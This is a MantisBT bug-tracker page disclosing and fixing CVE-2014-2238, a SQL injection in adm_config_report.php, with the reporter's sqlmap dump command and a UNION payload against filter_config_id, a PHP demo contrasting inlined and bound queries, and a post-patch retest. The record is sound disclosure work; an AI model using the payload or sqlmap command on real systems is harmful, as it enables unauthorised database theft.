MantisBT

View Issue Details

ID: 0017055
Project: mantisbt
Category: security
View Status: public
Date Submitted: 2014-02-28 11:00
Last Update: 2014-03-03 14:24
Reporter: HauntIT
Assigned To: dregad
Priority: immediate
Severity: major
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: 1.2.13
Target Version: 1.2.17
Fixed in Version: 1.2.17
Summary: 0017055: CVE-2014-2238: SQL injection vulnerability in adm_config_report.php
Description: Jakub Galczyk from HauntIT discovered an SQL injection vulnerability in the manage configuration page.
Additional Information:

k@lab:~/src/sqlmap$ ./sqlmap.py -u "http://10.149.14.62//k/cms/mantis/mantisbt-1.2.16/adm_config_report.php" --data "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-2&apply_filter_button=Apply+Filter" -cookie "groupoffice=l8iqg3amg3klb0rn39u2ms19q3; p7token=2aec66601c948d5bf84eae77cc743529; itop-6e03ab144a03733e272e7756ba585991=ual3fb0vsqm9847uodsvs79472; PHPSESSID=3srq832a7cfmn6dku1ttr70tq1; __utma=65758510.2100553510.1393586134.1393586134.1393586134.1; __utmc=65758510;__utmz=65758510.1393586134.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MANTIS_secure_session=1; MANTIS_STRING_COOKIE=f53b003d0014eeea9028334751d8c28bf8f23e56fe7bc77e46bbe7c857a280f4; MANTIS_PROJECT_COOKIE=1; MANTIS_MANAGE_CONFIG_COOKIE=0%3A0%3A-2; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_BUG_LIST_COOKIE=1;" --dbms=mysql --dump

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:19:12

[15:19:12] [INFO] testing connection to the target URL
[15:19:12] [INFO] testing if the target URL is stable. This can take a couple of seconds
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie h
[15:19:16] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[15:19:17] [INFO] testing if POST parameter 'save' is dynamic
[15:19:17] [WARNING] POST parameter 'save' does not appear dynamic
(...)
[15:20:32] [INFO] target URL appears to be UNION injectable with 6 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[15:22:22] [INFO] testing 'Generic UNION query (11) - 1 to 10 columns'
[15:22:25] [INFO] target URL appears to be UNION injectable with 7 columns
[15:22:32] [INFO] POST parameter 'filter_config_id' is 'Generic UNION query (11) - 1 to 10 columns' injectable
POST parameter 'filter_config_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
(...)

[15:23:13] [WARNING] POST parameter 'apply_filter_button' is not injectable
sqlmap identified the following injection points with a total of 815 HTTP(s) requests:
---
Place: POST
Parameter: filter_config_id
    Type: UNION query
    Title: Generic UNION query (11) - 6 columns
    Payload: save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-4074' UNION ALL SELECT 11,CONCAT(0x716b737471,0x737a4e7050735579665a,0x71706b6d71),11,11,11,11-- &apply_filter_button=Apply Filter
---
[15:23:13] [INFO] testing MySQL
[15:23:14] [INFO] confirming MySQL
[15:23:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.0
[15:23:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[15:23:14] [INFO] fetching current database
[15:23:14] [INFO] fetching tables for database: 'bugtracker'
[15:23:14] [INFO] the SQL query used returns 31 entries
[15:23:15] [INFO] retrieved: "mantis_bug_file_table"
[15:23:15] [INFO] retrieved: "mantis_bug_history_table"
[15:23:15] [INFO] retrieved: "mantis_bug_monitor_table"
[15:23:15] [INFO] retrieved: "mantis_bug_relationship_table"
[15:23:15] [INFO] retrieved: "mantis_bug_revision_table"
[15:23:15] [INFO] retrieved: "mantis_bug_table"
[15:23:16] [INFO] retrieved: "mantis_bug_tag_table"
[15:23:16] [INFO] retrieved: "mantis_bug_text_table"
[15:23:16] [INFO] retrieved: "mantis_bugnote_table"
[15:23:16] [INFO] retrieved: "mantis_bugnote_text_table"
[15:23:16] [INFO] retrieved: "mantis_category_table"
(...)
Tags: No tags attached.
Attached Files: none
Relationships: none

Notes

Note 0039585
dregad (developer)
2014-02-28 12:11
edited on: 2014-02-28 12:12

I can confirm the vulnerability, which is due to inlining query parameters instead of using db_param().

Bug was introduced in 1.2.13, by commit f8a81a33880752364ea47bdd9a987bff986c81de
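The root cause the note names, as an added illustration rather than MantisBT's own code: the same configuration filter built once by splicing filter_config_id into the SQL text, and once with the db_param() placeholder form the fix uses. The table layout, the second table, and the two stand-in helpers (db_param() returning a positional placeholder, db_query_bound() wrapping a PDO prepared statement; MantisBT 1.2 has functions of these names, but the bodies here are this example's own) are assumptions for the demo. The submitted value has the shape of the payload in the report, pointed at a constructed, harmless table so the effect of the two query styles can be compared side by side.

```php
<?php
// Added illustration of the root cause behind CVE-2014-2238; not MantisBT's
// own code. Runs stand-alone with php-cli and the pdo_sqlite extension.

// Stand-in for MantisBT's db_param(): yields the positional placeholder the
// database layer expects. (Real MantisBT returns a driver-specific marker.)
function db_param() {
    return '?';
}

// Stand-in for MantisBT's db_query_bound(): prepare once, bind the values,
// so the driver never treats them as SQL text. Uses PDO here (assumption).
function db_query_bound( PDO $p_db, $p_query, array $p_params = array() ) {
    $t_stmt = $p_db->prepare( $p_query );
    $t_stmt->execute( $p_params );
    return $t_stmt->fetchAll( PDO::FETCH_ASSOC );
}

// Vulnerable pattern (the shape implied by the report's payload): the filter
// value is inlined inside a quoted literal, so a quote in it ends the literal.
function config_report_inlined( PDO $p_db, $p_filter_config_id ) {
    $t_query = "SELECT config_id, user_id, project_id, type, value, access_reqd"
             . " FROM mantis_config_table"
             . " WHERE config_id = '$p_filter_config_id'";
    return $p_db->query( $t_query )->fetchAll( PDO::FETCH_ASSOC );
}

// Fixed pattern: placeholder in the SQL, the value travels as a parameter and
// is compared as one opaque string whatever characters it contains.
function config_report_bound( PDO $p_db, $p_filter_config_id ) {
    $t_query = "SELECT config_id, user_id, project_id, type, value, access_reqd"
             . " FROM mantis_config_table"
             . " WHERE config_id = " . db_param();
    return db_query_bound( $p_db, $t_query, array( $p_filter_config_id ) );
}

// Constructed sample schema: a minimal config table plus an unrelated table
// with the same column count, which is what a UNION needs to succeed.
$t_db = new PDO( 'sqlite::memory:' );
$t_db->setAttribute( PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION );
$t_db->exec( 'CREATE TABLE mantis_config_table ( config_id TEXT, user_id INTEGER,'
           . ' project_id INTEGER, type INTEGER, value TEXT, access_reqd INTEGER )' );
$t_db->exec( "INSERT INTO mantis_config_table VALUES ( 'allow_signup', 0, 0, 1, '1', 90 )" );
$t_db->exec( 'CREATE TABLE mantis_project_table ( id INTEGER, name TEXT, status INTEGER,'
           . ' enabled INTEGER, view_state INTEGER, description TEXT )' );
$t_db->exec( "INSERT INTO mantis_project_table VALUES ( 1, 'demo project', 10, 1, 10, 'constructed row' )" );

// Submitted filter_config_id, shaped like the report's payload: a quote closes
// the literal, a six-column UNION appends rows from another table, and a
// comment swallows the rest of the statement.
$t_filter_config_id = "-4074' UNION ALL SELECT id, name, status, enabled, view_state, description"
                    . " FROM mantis_project_table-- ";

$t_inlined = config_report_inlined( $t_db, $t_filter_config_id );
$t_bound   = config_report_bound( $t_db, $t_filter_config_id );

// With the inlined form the UNION's rows come back as if they were config
// entries; with the bound form the whole string is one config_id value that
// matches nothing, which is the behaviour the post-patch sqlmap run reflects.
echo 'inlined: ', count( $t_inlined ), " row(s)\n";
echo 'bound:   ', count( $t_bound ), " row(s)\n";
```

The check to apply when reviewing similar code is mechanical: any variable that appears inside the SQL string itself, rather than in the parameter array passed alongside it, is a candidate for the same defect regardless of how the value was validated earlier.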

Note 0039586
dregad (developer)
2014-02-28 12:33

sqlmap test after patching:

[*] starting at 18:32:39

[18:32:39] [INFO] testing connection to the target URL
[18:32:39] [INFO] testing if the target URL is stable. This can take a couple of seconds
[18:32:40] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. 
If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual 
paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] 
[18:32:41] [INFO] skipping POST parameter 'save'
[18:32:41] [INFO] skipping POST parameter 'filter_user_id'
[18:32:41] [INFO] skipping POST parameter 'filter_project_id'
[18:32:41] [INFO] testing if POST parameter 'filter_config_id' is dynamic
[18:32:41] [INFO] confirming that POST parameter 'filter_config_id' is dynamic
[18:32:42] [INFO] POST parameter 'filter_config_id' is dynamic
[18:32:42] [WARNING] heuristic (basic) test shows that POST parameter 'filter_config_id' might not be 
injectable
[18:32:42] [INFO] testing for SQL injection on POST parameter 'filter_config_id'
[18:32:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:32:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[18:32:44] [INFO] testing 'MySQL inline queries'
[18:32:44] [WARNING] reflective value(s) found and filtering out
[18:32:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:32:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:32:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:32:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:32:59] [WARNING] POST parameter 'filter_config_id' is not injectable
[18:32:59] [INFO] skipping POST parameter 'apply_filter_button'
[18:32:59] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' 
values to perform more tests. Also, you can try to rerun by providing either a valid value for option 
'--string' (or '--regexp')

[*] shutting down at 18:32:59
Note 0039587
dregad (developer)
2014-02-28 15:03

CVE request http://thread.gmane.org/gmane.comp.security.oss.general/12241

Related Changesets
MantisBT: master-1.2.x a608f2d0
Timestamp: 2014-02-28 12:23:14
Author: dregad
Fix SQL injection vulnerability in adm_config_report.php

Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this
issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in
MantisBT 1.2.13.

Root cause is the use of unsanitized inlined query parameters.

Fixes 0017055
mod - adm_config_report.php
MantisBT: master e8bdd248
Timestamp: 2014-02-28 12:23:14
Author: dregad
Fix SQL injection vulnerability in adm_config_report.php

Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this
issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in
MantisBT 1.2.13.

Root cause is the use of unsanitized inlined query parameters.

Fixes 0017055
mod - adm_config_report.php

Issue History
Date Modified Username Field Change
2014-02-28 11:00 dregad New Issue
2014-02-28 11:01 dregad Reporter dregad => HauntIT
2014-02-28 12:11 dregad Note Added: 0039585
2014-02-28 12:11 dregad Status new => confirmed
2014-02-28 12:11 dregad Product Version 1.2.16 => 1.2.13
2014-02-28 12:12 dregad Note Edited: 0039585 View Revisions
2014-02-28 12:31 dregad Changeset attached => MantisBT master-1.2.x a608f2d0
2014-02-28 12:31 dregad Assigned To => dregad
2014-02-28 12:31 dregad Status confirmed => resolved
2014-02-28 12:31 dregad Resolution open => fixed
2014-02-28 12:31 dregad Fixed in Version => 1.2.17
2014-02-28 12:31 dregad Changeset attached => MantisBT master e8bdd248
2014-02-28 12:33 dregad Note Added: 0039586
2014-02-28 12:35 dregad View Status private => public
2014-02-28 15:03 dregad Note Added: 0039587
2014-02-28 15:35 dregad Summary SQL injection vulnerability in adm_config_report.php => CVE-2014-2238: SQL injection vulnerability in adm_config_report.php
2014-03-03 14:24 dregad Status resolved => closed

